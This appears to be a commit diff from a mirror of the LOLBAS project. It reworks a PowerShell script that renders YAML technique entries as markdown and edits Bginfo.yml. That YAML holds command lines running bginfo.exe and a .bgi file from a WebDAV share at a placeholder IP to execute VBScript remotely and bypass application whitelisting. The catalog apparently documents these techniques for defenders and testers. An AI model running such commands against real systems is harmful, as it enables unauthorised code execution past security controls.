public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-26 06:49:09 +01:00
Code Issues Projects Releases Wiki Activity

minor adjustments

Browse Source
This commit is contained in:
Oddvar Moe 2018-09-25 02:33:38 +02:00
parent a2db5dca8c
commit 7961a99173
2 changed files with 227 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

234
Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
View File

@ -29,18 +29,226 @@ function Convert-YamlToMD
"name: $($YamlObject.Name)"| Add-Content $Outfile "name: $($YamlObject.Name)"| Add-Content $Outfile
"description: $($YamlObject.Description)"| Add-Content $Outfile "description: $($YamlObject.Description)"| Add-Content $Outfile
"functions:"| Add-Content $Outfile "functions:"| Add-Content $Outfile
foreach($cmd in $YamlObject.Commands) $Exe = @()
$Down = @()
$Uplo = @()
$Enco = @()
$Deco = @()
$Copy = @()
$Cred = @()
$Comp = @()
$ADS = @()
$AWL = @()
$Reco = @()
$Dump = @()
foreach($grp in $YamlObject.Commands)
{ {
" $($cmd.Category):"| Add-Content $Outfile if($grp.Category -eq "Execute"){$Exe += $grp}
" - description: $($cmd.Description)"| Add-Content $Outfile if($grp.Category -eq "Download"){$Down += $grp}
" code: $($cmd.Command)"| Add-Content $Outfile if($grp.Category -eq "Upload"){$Uplo += $grp}
" mitreid: $($cmd.MitreID)"| Add-Content $Outfile if($grp.Category -eq "Encode"){$Enco += $grp}
" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile if($grp.Category -eq "Decode"){$Deco += $grp}
" operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile if($grp.Category -eq "Alternate data streams"){$ADS += $grp}
" privileges: $($cmd.Privileges)"| Add-Content $Outfile if($grp.Category -eq "Copy"){$Copy += $grp}
" usecase: $($cmd.UseCase)"| Add-Content $Outfile if($grp.Category -eq "Credentials"){$Cred += $grp}
if($grp.Category -eq "Compile"){$Comp += $grp}
if($grp.Category -eq "AWL bypass"){$AWL += $grp}
if($grp.Category -eq "Reconnaissance"){$Reco += $grp}
if($grp.Category -eq "Dump"){$Dump += $grp}
} }
if($Exe)
{
" $($Exe[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Exe)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($Down)
{
" $($Down[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Down)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($Uplo)
{
" $($Uplo[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Uplo)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($Enco)
{
" $($Enco[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Enco)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($Deco)
{
" $($Deco[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Deco)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($Copy)
{
" $($Copy[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Copy)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($Cred)
{
" $($Cred[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Cred)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($Comp)
{
" $($Comp[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Comp)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($ADS)
{
" $($ADS[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $ADS)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($AWL)
{
" $($AWL[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $AWL)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($Reco)
{
" $($Reco[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Reco)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
if($Dump)
{
" $($Dump[0].Category.ToLower()):"| Add-Content $Outfile
foreach($Ex in $Dump)
{
" - description: $($Ex.Description)"| Add-Content $Outfile
" code: $($Ex.Command)"| Add-Content $Outfile
" mitreid: $($Ex.MitreID)"| Add-Content $Outfile
" mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
" privileges: $($Ex.Privileges)"| Add-Content $Outfile
" usecase: $($Ex.UseCase)"| Add-Content $Outfile
}
}
#$Groups = $YamlObject.Commands | Group-Object {$_.Category}
#" $($grp.Name):"| Add-Content $Outfile
#" - description: $($cmd.Description)"| Add-Content $Outfile
#" code: $($cmd.Command)"| Add-Content $Outfile
#" mitreid: $($cmd.MitreID)"| Add-Content $Outfile
#" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
#" operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile
#" privileges: $($cmd.Privileges)"| Add-Content $Outfile
#" usecase: $($cmd.UseCase)"| Add-Content $Outfile
#foreach($cmd in $YamlObject.Commands)
#{
#" $($cmd.Category):"| Add-Content $Outfile
# " - description: $($cmd.Description)"| Add-Content $Outfile
# " code: $($cmd.Command)"| Add-Content $Outfile
# " mitreid: $($cmd.MitreID)"| Add-Content $Outfile
# " mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
# " operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile
# " privileges: $($cmd.Privileges)"| Add-Content $Outfile
# " usecase: $($cmd.UseCase)"| Add-Content $Outfile
#}
"resources:"| Add-Content $Outfile "resources:"| Add-Content $Outfile
foreach($link in $YamlObject.Resources) foreach($link in $YamlObject.Resources)
{ {
@ -124,10 +332,10 @@ function Invoke-GenerateMD
#Generate the stuff! #Generate the stuff!
#Bins #Bins
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
##Scripts ##Scripts
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\Scripts" -Verbose Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\Scripts" -Verbose
##Libs ##Libs
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose

10
yml/OtherMSBinaries/Bginfo.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows OperatingSystem: Windows
- Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt' - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server. Description: Execute bginfo.exe from a WebDAV server.
Category: AWL Bypass Category: AWL Bypass
@ -20,7 +20,7 @@ Commands:
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows OperatingSystem: Windows
- Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt' - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch. Description: This style of execution may not longer work due to patch.
Category: AWL Bypass Category: AWL Bypass
@ -30,8 +30,10 @@ Commands:
OperatingSystem: Windows OperatingSystem: Windows
Full Path: Full Path:
- No fixed path - No fixed path
Code Sample: [] Code Sample:
Detection: [] - Code:
Detection:
- IOC:
Resources: Resources:
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Acknowledgement: Acknowledgement: